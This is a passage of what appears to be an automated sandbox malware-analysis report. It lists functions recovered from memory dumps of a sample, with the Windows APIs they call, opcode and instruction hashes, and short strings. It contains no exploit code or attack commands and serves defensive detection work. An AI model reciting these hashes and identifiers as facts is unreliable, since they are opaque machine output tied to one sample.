DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 2932E3CB

Memory Dump Source

Source File: 00000003.00000002.4144847352.0000000029320000.00000040.00000800.00020000.00000000.sdmp, Offset: 29320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29320000_jphwmyiA.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 5cb72b980948f60438e58046732fb40d3f7b4397e295b231708b67438fb08575
Instruction ID: f935bec31096c783a50cfb22dd61248b05172c6a3e2c0bbcaac632d99c7a39dd
Opcode Fuzzy Hash: 5cb72b980948f60438e58046732fb40d3f7b4397e295b231708b67438fb08575
Instruction Fuzzy Hash: 884145B9D002589FCB10CFA9D984ADEBBF5BB19310F24906AE918BB310D335A955CF94

Function 2932E2FA Relevance: 1.6, APIs: 1, Instructions: 108COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 2932E3CB

Memory Dump Source

Source File: 00000003.00000002.4144847352.0000000029320000.00000040.00000800.00020000.00000000.sdmp, Offset: 29320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29320000_jphwmyiA.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 6a4cc89d1b3f7c048e9137eb572df98b73ddf5619918d28bba843042217e68e5
Instruction ID: a21dc6aa54105bc38d7c0108c11b186f1c12ebf1356dd1158f56f4e28be642c3
Opcode Fuzzy Hash: 6a4cc89d1b3f7c048e9137eb572df98b73ddf5619918d28bba843042217e68e5
Instruction Fuzzy Hash: E44166B9D002589FCB10CFA9D984ADEBBF5BB49310F24942AE918BB310D335A955CF94

Function 2924B3DC Relevance: 1.6, APIs: 1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4144277720.0000000029240000.00000040.00000800.00020000.00000000.sdmp, Offset: 29240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29240000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 961b0ba55e25f956c7a883c94dd3faa50663d10ff2ffe2f087615c24ffff6dd3
Instruction ID: ebe31799fa23d613fe6046e2da80448e9640193af442da58985d0829c709d954
Opcode Fuzzy Hash: 961b0ba55e25f956c7a883c94dd3faa50663d10ff2ffe2f087615c24ffff6dd3
Instruction Fuzzy Hash: E8413778D04208CFCB08DF99D994ADDBBB6FF49354F20A159E404AB286C735A987CF90

Function 2924B2A0 Relevance: 1.6, APIs: 1, Instructions: 100libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 2924B2F1

Memory Dump Source

Source File: 00000003.00000002.4144277720.0000000029240000.00000040.00000800.00020000.00000000.sdmp, Offset: 29240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29240000_jphwmyiA.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 268eea0e2118a1631e37d0d92a2781f05300296d5c364010ee9b71ec193d98a8
Instruction ID: d81ab8fdf866a741f20b1041026468422f4110bb388e09b2134afa6da43a2383
Opcode Fuzzy Hash: 268eea0e2118a1631e37d0d92a2781f05300296d5c364010ee9b71ec193d98a8
Instruction Fuzzy Hash: 57414C74D05108DBCB08DF9AD980ADDFBF6BF88354F24E159E4046B285D731A986CF90

Function 2932DF84 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 2932F271

Memory Dump Source

Source File: 00000003.00000002.4144847352.0000000029320000.00000040.00000800.00020000.00000000.sdmp, Offset: 29320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29320000_jphwmyiA.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 4e4e794ba1831a5c8fccff083ad3332bf473c9ab692cc1707ea1b4ead614ff4d
Instruction ID: 63d6c3e32d5a29ae5ca5808cb26f8984e3028fe4cd396db8a469e42e47a22c95
Opcode Fuzzy Hash: 4e4e794ba1831a5c8fccff083ad3332bf473c9ab692cc1707ea1b4ead614ff4d
Instruction Fuzzy Hash: B14115B9900709CFDB04CF99C484A9EBBF5FB89310F24C569D519AB321C774A842CFA0

Function 2500EE60 Relevance: 1.6, APIs: 1, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 2500EF04

Memory Dump Source

Source File: 00000003.00000002.4134870299.0000000025000000.00000040.00000800.00020000.00000000.sdmp, Offset: 25000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_25000000_jphwmyiA.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 24fefbb5989d46e34cfe8ba418ffeaecf28aded66965ec46a168dbdee79cf48c
Instruction ID: fb78b74c6b7d8c3d6076ae76e066af0cc941fb727f1e75623ea3139859a7b45c
Opcode Fuzzy Hash: 24fefbb5989d46e34cfe8ba418ffeaecf28aded66965ec46a168dbdee79cf48c
Instruction Fuzzy Hash: 8E31A7B4D002589FCB10CFA9D980AEEFBF0BB49310F20902AE818B7210D735A945CF58

Function 29328C40 Relevance: 1.6, APIs: 1, Instructions: 88timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(00000000,?,?,00000000), ref: 2932F4EB

Memory Dump Source

Source File: 00000003.00000002.4144847352.0000000029320000.00000040.00000800.00020000.00000000.sdmp, Offset: 29320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29320000_jphwmyiA.jbxd

Similarity

API ID: Timer
String ID:
API String ID: 2870079774-0
Opcode ID: 459e02b0bd9548e27afb8bf39674f3aa57d0a5c26d73be4eb7263bce08fcdd44
Instruction ID: a213e606ff6d809576606149b54c3ba267f039fd4920d4b5f9a7c88abfae6e34
Opcode Fuzzy Hash: 459e02b0bd9548e27afb8bf39674f3aa57d0a5c26d73be4eb7263bce08fcdd44
Instruction Fuzzy Hash: A53188B9D042589FCB10CF99D584ADEFBF4AB19310F24902AE814BB310D775A945CF94

Function 2932F448 Relevance: 1.6, APIs: 1, Instructions: 87timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(00000000,?,?,00000000), ref: 2932F4EB

Memory Dump Source

Source File: 00000003.00000002.4144847352.0000000029320000.00000040.00000800.00020000.00000000.sdmp, Offset: 29320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29320000_jphwmyiA.jbxd

Similarity

API ID: Timer
String ID:
API String ID: 2870079774-0
Opcode ID: a0cef722e1c3c651fe0d3bc8290858e32d2ef04cd8b67101ed319e6aaefd4d5d
Instruction ID: e9813f7a2066fa272105b7309e409e30492e3047ad080e9341d95d55b78f9157
Opcode Fuzzy Hash: a0cef722e1c3c651fe0d3bc8290858e32d2ef04cd8b67101ed319e6aaefd4d5d
Instruction Fuzzy Hash: CF3167B9D002589FCB14CFA9E584ADEFBF4AB59310F24902AE814BB310D375A945CF54

Function 29329B98 Relevance: 1.6, APIs: 1, Instructions: 79COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?), ref: 2932A9F2

Memory Dump Source

Source File: 00000003.00000002.4144847352.0000000029320000.00000040.00000800.00020000.00000000.sdmp, Offset: 29320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29320000_jphwmyiA.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 3cf2a76578383a076a4b692307a3cb5c75b14bac18859c7eead33daa9546989f
Instruction ID: b289af36eb3fb7a73977ec779ae3db4ea767683201e8335ec09f9e10e2bf8f3e
Opcode Fuzzy Hash: 3cf2a76578383a076a4b692307a3cb5c75b14bac18859c7eead33daa9546989f
Instruction Fuzzy Hash: D031B9B4D046489FDB14CFAAD584ADEFBF5AF49310F14906AE818B7360D334A942CFA4

Function 2932A958 Relevance: 1.6, APIs: 1, Instructions: 78COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?), ref: 2932A9F2

Memory Dump Source

Source File: 00000003.00000002.4144847352.0000000029320000.00000040.00000800.00020000.00000000.sdmp, Offset: 29320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29320000_jphwmyiA.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 9831f780b9ac671f94bc31c5a7319c9ecfd48402a4019ad1e1b46e3e7a4ac8fc
Instruction ID: 8da67ed6c4599882a85fb362bfa9af30493a510be062632e483c2eebd48214f8
Opcode Fuzzy Hash: 9831f780b9ac671f94bc31c5a7319c9ecfd48402a4019ad1e1b46e3e7a4ac8fc
Instruction Fuzzy Hash: D73198B4D002599FDB14CFAAD584ADEFBF5AF49310F14906AE818B7260D334A982CF64

Function 29AFDA58 Relevance: 1.6, APIs: 1, Instructions: 70windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?), ref: 29AFDADB

Memory Dump Source

Source File: 00000003.00000002.4146339671.0000000029AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 29AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29af0000_jphwmyiA.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 55cf8081a52857cdca770edb52b3bb4a76df8841f179bef5a19661ec8bddb7d6
Instruction ID: 10de22e8de1cf8489d0c11d917585a92aafce26fdf3a164635068629e9a91ae7
Opcode Fuzzy Hash: 55cf8081a52857cdca770edb52b3bb4a76df8841f179bef5a19661ec8bddb7d6
Instruction Fuzzy Hash: 583196B5D002089FCB14CFA9D584ADEFBF4EB49320F24906AE818B7210D375A9418FA5

Function 29AFDA60 Relevance: 1.6, APIs: 1, Instructions: 68windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?), ref: 29AFDADB

Memory Dump Source

Source File: 00000003.00000002.4146339671.0000000029AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 29AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29af0000_jphwmyiA.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 9074e4e1981d013d48f6fa2a56788f0dac31fa963bcafec891bafcba61d5de01
Instruction ID: 1d7bace9572afa06d45400093c3d8813938cb64c81042ab58d1b08f9b8aee39e
Opcode Fuzzy Hash: 9074e4e1981d013d48f6fa2a56788f0dac31fa963bcafec891bafcba61d5de01
Instruction Fuzzy Hash: 8C2198B4D042089FCB14CFA9D584ADEFBF4EB49320F24906AE818B7310D375A941CFA5

Function 29247E0C Relevance: 1.6, APIs: 1, Instructions: 62libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(00000000), ref: 29247F4E

Memory Dump Source

Source File: 00000003.00000002.4144277720.0000000029240000.00000040.00000800.00020000.00000000.sdmp, Offset: 29240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29240000_jphwmyiA.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5559a54fe874876ea2a1b223cdd01e5718f34f414f8390b51052ae6588772607
Instruction ID: 98a092516cb3826c71bae775aab78adaf083ed4a05baae271253feff39fb8a16
Opcode Fuzzy Hash: 5559a54fe874876ea2a1b223cdd01e5718f34f414f8390b51052ae6588772607
Instruction Fuzzy Hash: FD113D74E111199FDB08DFA8D884EADBBB9BF88314F14A565E914E7242DB30A942CB60

Function 00401870 Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040AF66: _malloc.LIBCMT ref: 0040AF80

SysAllocString.OLEAUT32 ref: 00401898

Memory Dump Source

Source File: 00000003.00000001.1687216190.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.1687216190.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_400000_jphwmyiA.jbxd

Yara matches

Similarity

API ID: AllocString_malloc
String ID:
API String ID: 959018026-0
Opcode ID: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
Instruction ID: c2922591c351a4c461934d9b8210169c8be4224f150a02a6988c85a72df9e820
Opcode Fuzzy Hash: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
Instruction Fuzzy Hash: BEF02073501322A7E3316B658841B47B6E8DF80B28F00823FFD44BB391D3B9C85082EA

Function 0040D534 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNEL32(00000000,00001000,00000000), ref: 0040D549

Memory Dump Source

Source File: 00000003.00000001.1687216190.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.1687216190.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_400000_jphwmyiA.jbxd

Yara matches

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548

Function 29258D18 Relevance: 1.4, Strings: 1, Instructions: 153COMMON

Download Yara Rule

Strings

nKvq, xrefs: 29258DC6

Memory Dump Source

Source File: 00000003.00000002.4144371849.0000000029250000.00000040.00000800.00020000.00000000.sdmp, Offset: 29250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29250000_jphwmyiA.jbxd

Similarity

API ID:
String ID: nKvq
API String ID: 0-3625296599
Opcode ID: d36c7035df1effc4c2235fd596919b36af23665de4c24f7b747672a8d66fe7b7
Instruction ID: 9afbe37e51f876fe6b5e35f71ceaf70b17f440aa0fbf6899b0dab8c3a15dabdc
Opcode Fuzzy Hash: d36c7035df1effc4c2235fd596919b36af23665de4c24f7b747672a8d66fe7b7
Instruction Fuzzy Hash: D561A474E002199FDB08DFA9C954ADDBBF2FF88300F10842AD915AB3A4DB755946CF50

Function 27929928 Relevance: 1.4, Strings: 1, Instructions: 110COMMON

Download Yara Rule

Strings

4'^q, xrefs: 279299A3

Memory Dump Source

Source File: 00000003.00000002.4141493566.0000000027920000.00000040.00000800.00020000.00000000.sdmp, Offset: 27920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_27920000_jphwmyiA.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: a58839c9aa917bfe1d9fb81934eb3eb0748c91047a7aee352d50076ae976db02
Instruction ID: 26faecb80ce9986d800e0507c79032dbd20d3ee3feaea358fd17afc02c478c1e
Opcode Fuzzy Hash: a58839c9aa917bfe1d9fb81934eb3eb0748c91047a7aee352d50076ae976db02
Instruction Fuzzy Hash: A6418A74600615DFCB04EF28C988A6E7BB9BB88324F2000A8E905DB3A0CB34DD40DB91

Function 279284F3 Relevance: 1.3, Strings: 1, Instructions: 74COMMON

Download Yara Rule

Strings

H4G% 9G%, xrefs: 27928525, 2792858E

Memory Dump Source

Source File: 00000003.00000002.4141493566.0000000027920000.00000040.00000800.00020000.00000000.sdmp, Offset: 27920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_27920000_jphwmyiA.jbxd

Similarity

API ID:
String ID: H4G% 9G%
API String ID: 0-2814271860
Opcode ID: 0a40f232cb22922230e905c003e549cfe5c68ad221e12b2c1e2389c9c049b187
Instruction ID: 77402458da3f64f46929d69dc5e54ec9df6ed95d7427866434cd03917fb3d4c8
Opcode Fuzzy Hash: 0a40f232cb22922230e905c003e549cfe5c68ad221e12b2c1e2389c9c049b187
Instruction Fuzzy Hash: 8B314D70E04719EBDB14EFA0D945FAEBBB6BF44305F1040A9E901A7398CB799941DB90

Function 2500F130 Relevance: 1.3, APIs: 1, Instructions: 73COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?), ref: 2500F1AE

Memory Dump Source

Source File: 00000003.00000002.4134870299.0000000025000000.00000040.00000800.00020000.00000000.sdmp, Offset: 25000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_25000000_jphwmyiA.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: ab9cbdd6ba58500f590a08e2efbfad7b6d295ae64a07aadbd173fb0a5314745e
Instruction ID: 7fb22453efc093f04a0b6f7c23ec88fa7bcecf209d612dfce8322115b37b1218
Opcode Fuzzy Hash: ab9cbdd6ba58500f590a08e2efbfad7b6d295ae64a07aadbd173fb0a5314745e
Instruction Fuzzy Hash: B931A9B4D012589FDB14CFA9E980ADEFBF4AB49310F24942AE815B7350C774A941CF98

Function 279285F1 Relevance: 1.3, Strings: 1, Instructions: 65COMMON

Download Yara Rule

Strings

H4G% 9G%, xrefs: 27928622, 27928687

Memory Dump Source

Source File: 00000003.00000002.4141493566.0000000027920000.00000040.00000800.00020000.00000000.sdmp, Offset: 27920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_27920000_jphwmyiA.jbxd

Similarity

API ID:
String ID: H4G% 9G%
API String ID: 0-2814271860
Opcode ID: 0fb4dc76957da6516b40d8a56305e4d5ef1a837fcb25aaa47b81b5763535f286
Instruction ID: 33c8b78812dddecc2edb14bda8dc558a955af20f56ea2689ed9524f37a44e43d
Opcode Fuzzy Hash: 0fb4dc76957da6516b40d8a56305e4d5ef1a837fcb25aaa47b81b5763535f286
Instruction Fuzzy Hash: CA219C70E01609DFDB04DFA5D590AEDBFB6EF48309F2480A9E451E6254CB39EA41DF60

Function 2792CB20 Relevance: .6, Instructions: 647COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4141493566.0000000027920000.00000040.00000800.00020000.00000000.sdmp, Offset: 27920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_27920000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e51f41f85cbb5d0c50f497aee824626e70b83500ac2556f846650e74421293b7
Instruction ID: a2bd349b4c1c394550f9a7e694ecebd5e7192ad264d9291792921eed96fe86f0
Opcode Fuzzy Hash: e51f41f85cbb5d0c50f497aee824626e70b83500ac2556f846650e74421293b7
Instruction Fuzzy Hash: 401293352297468F9B097B28A6BE12BBB71FF0F363750AC55A11A80585CF3C04E9CF25

Function 292582D0 Relevance: .3, Instructions: 258COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4144371849.0000000029250000.00000040.00000800.00020000.00000000.sdmp, Offset: 29250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29250000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 631b5b287baefd90054497c948e482cea4265c30def3813949dc5221623fac39
Instruction ID: 773c5f62d8dbf3e1119e3d1db98d0fd5375aecf8df380129d6904847e5a4385d
Opcode Fuzzy Hash: 631b5b287baefd90054497c948e482cea4265c30def3813949dc5221623fac39
Instruction Fuzzy Hash: E3C1B075E012298FDB68CF68C850BDEBBB2BB48300F1085E9E54DA7290DB749E85CF51

Function 292582E0 Relevance: .2, Instructions: 249COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4144371849.0000000029250000.00000040.00000800.00020000.00000000.sdmp, Offset: 29250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29250000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2faa94e2101b50c84586d561640fe3a3102fc4b14d2b32620182ac8243ae8ad
Instruction ID: 904d9eb7841e772334d6804bf3547652af80c0f341d9de9e171b50bc505e07fa
Opcode Fuzzy Hash: b2faa94e2101b50c84586d561640fe3a3102fc4b14d2b32620182ac8243ae8ad
Instruction Fuzzy Hash: F7C1A075E012298FDB68CF69C850BDEBBB2BB48300F1085E9D54DA7290DB749E85CF51

Function 27928F88 Relevance: .2, Instructions: 215COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4141493566.0000000027920000.00000040.00000800.00020000.00000000.sdmp, Offset: 27920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_27920000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb27601228d215b3150089478b1d38f52aa2528832abe1fb614f0b51c84c04ee
Instruction ID: bcd8f4e06cb77f2c887a4bec422b515e63a879554f207b015184bedff4a18dc9
Opcode Fuzzy Hash: fb27601228d215b3150089478b1d38f52aa2528832abe1fb614f0b51c84c04ee
Instruction Fuzzy Hash: AB918774A00709DFCB05DFA9C8848DEBBF6FF88314F10856AE846AB215DB30A955CF50

Function 27926B5B Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4141493566.0000000027920000.00000040.00000800.00020000.00000000.sdmp, Offset: 27920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_27920000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82b07c3dc2bfb83892c5664d4527a6c38a23c4cbca871c56e4c19bafab39d713
Instruction ID: 0bc7e717ebd3b28b9747a2491741c2e72dd10608f4d957d79279e96f565f19b5
Opcode Fuzzy Hash: 82b07c3dc2bfb83892c5664d4527a6c38a23c4cbca871c56e4c19bafab39d713
Instruction Fuzzy Hash: 6A715934704A49CFCB04EF28C884A697BE9EF89719F1500A9E901CBB75DB75DC51DB90

Function 29258030 Relevance: .2, Instructions: 174COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4144371849.0000000029250000.00000040.00000800.00020000.00000000.sdmp, Offset: 29250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29250000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b6be22f50e1fe4b9c6a2520b5d38430c0c16f62af93ba0fe9002ffbaa2878d9
Instruction ID: d910f2da9c6a499748e604e2f3d46d8c7c543960c5b3b592fadfd42479a519dd
Opcode Fuzzy Hash: 4b6be22f50e1fe4b9c6a2520b5d38430c0c16f62af93ba0fe9002ffbaa2878d9
Instruction Fuzzy Hash: A3611674E012089FDB08DFE9D990B9EBBF2BF88310F14D469E908EB355DA709942CB11

Function 29316760 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4144755266.0000000029310000.00000040.00000800.00020000.00000000.sdmp, Offset: 29310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29310000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a77fa99783ac1a5c9e2952f3b692003c616344591ba054fb2d06dad5cbd5b97
Instruction ID: 2f6323cf912090319ec8f0f2b0b9be7a30a9d8610aa7715189e550fc078b21e6
Opcode Fuzzy Hash: 2a77fa99783ac1a5c9e2952f3b692003c616344591ba054fb2d06dad5cbd5b97
Instruction Fuzzy Hash: CD71C274E00218DFDB18DFE5C990A9DBBB2BF89304F209129D409BB364DB356946CF50

Function 2931C790 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4144755266.0000000029310000.00000040.00000800.00020000.00000000.sdmp, Offset: 29310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29310000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ebbcc31ff9671016dd6eb6b6271a2ce50f497fddc436b186cd38d4676049b79
Instruction ID: 71197d4e9c24f793a2646b5ea5cf573320a5bc5c89c94a054404b56aac54a6e3
Opcode Fuzzy Hash: 5ebbcc31ff9671016dd6eb6b6271a2ce50f497fddc436b186cd38d4676049b79
Instruction Fuzzy Hash: D971D374E00218DFDB08DFA5C990A9DBBF2BF89304F209129D405BB364DB359942DF54

Function 2931CA80 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4144755266.0000000029310000.00000040.00000800.00020000.00000000.sdmp, Offset: 29310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29310000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b9a7a7ea31448317f9070cbf41ebd4b023d357b8cad4dda8aea62516b9e69e6
Instruction ID: 9d00c2144f49883a3db0e43aa935cb0adc2fd2f4b445b1c4c2f0b7da8a804516
Opcode Fuzzy Hash: 8b9a7a7ea31448317f9070cbf41ebd4b023d357b8cad4dda8aea62516b9e69e6
Instruction Fuzzy Hash: 78819C74E412289FDB69CF69C890BDDBBB2BF89300F1080EAD959A7250DB755E81CF40

Function 29301360 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4144666290.0000000029300000.00000040.00000800.00020000.00000000.sdmp, Offset: 29300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29300000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1af1a7c9cd96acf5a7d0e258b7a7e9838fa53603e14e7736b191f0ade31af538
Instruction ID: 2428a7e30343beba139b1993eb61ef3b940aa0992c00fb17f1f6444b0e8dcc0f
Opcode Fuzzy Hash: 1af1a7c9cd96acf5a7d0e258b7a7e9838fa53603e14e7736b191f0ade31af538
Instruction Fuzzy Hash: A371C274E01218DFDB08DFE5C990A9EBBB2AF89300F209129D809BB355DB359946CF50

Function 29307390 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4144666290.0000000029300000.00000040.00000800.00020000.00000000.sdmp, Offset: 29300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29300000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aee8d5024e6d199edc8ccbeb13b823cfdb35a423cd7bc922ca28c91c378b6714
Instruction ID: 5c9d29c637ceaf68c57c82a8abe1a8773b060a8c1f90cdf892331a43ef3b0463
Opcode Fuzzy Hash: aee8d5024e6d199edc8ccbeb13b823cfdb35a423cd7bc922ca28c91c378b6714
Instruction Fuzzy Hash: F671C274E01218DFDB08DFA5C990ADEBBB2BF88300F249129D809BB355DB35A946CF50

Function 279233F0 Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4141493566.0000000027920000.00000040.00000800.00020000.00000000.sdmp, Offset: 27920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_27920000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bfd241ba057f1b76c37f3a719d8bcdc30bc3aab9f9c522e2dedb0effaa73a716
Instruction ID: f686494df4c6a8cfc1741803fbdad0fcd60235d39c27efca0ae0a9b8454ef8b8
Opcode Fuzzy Hash: bfd241ba057f1b76c37f3a719d8bcdc30bc3aab9f9c522e2dedb0effaa73a716
Instruction Fuzzy Hash: C6519774E11708CFCB08DFA9D59499DBBF2FF89304B209169E809AB364DB35A941CF51

Function 2792E3A3 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4141493566.0000000027920000.00000040.00000800.00020000.00000000.sdmp, Offset: 27920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_27920000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d705e79b716b34546e62bb5e290eb1e5a6bad4fb65c5f565700366d5a342e16
Instruction ID: 0fa60bfb3ab9840e073de2a91bcd9cd6eb4174d61fb21d4339089bd50f1dca0f
Opcode Fuzzy Hash: 5d705e79b716b34546e62bb5e290eb1e5a6bad4fb65c5f565700366d5a342e16
Instruction Fuzzy Hash: D051D074D01318DFDF14DFA5C994AAEBBB6BF88304F208529D809AB394DB759985CF40

Function 2931E1B8 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4144755266.0000000029310000.00000040.00000800.00020000.00000000.sdmp, Offset: 29310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29310000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86b2f9d65890fb6b646aacdc949894a36e9dac3ff7ddb619132b737ab964c052
Instruction ID: 6eccde8b3ef5f11a825bcef4512723304921bd2c7e93dcf5e8bd041e4bbcd0b9
Opcode Fuzzy Hash: 86b2f9d65890fb6b646aacdc949894a36e9dac3ff7ddb619132b737ab964c052
Instruction Fuzzy Hash: 8A61AE74E002289FDB69CF69CD94BDABBB2BF89300F1080E9950CA7254EB315E81CF45

Function 29258898 Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4144371849.0000000029250000.00000040.00000800.00020000.00000000.sdmp, Offset: 29250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29250000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88aa8204b4779ee0ec7fead96d3bb14e5b96c55f5605193f2add94adbb2756d6
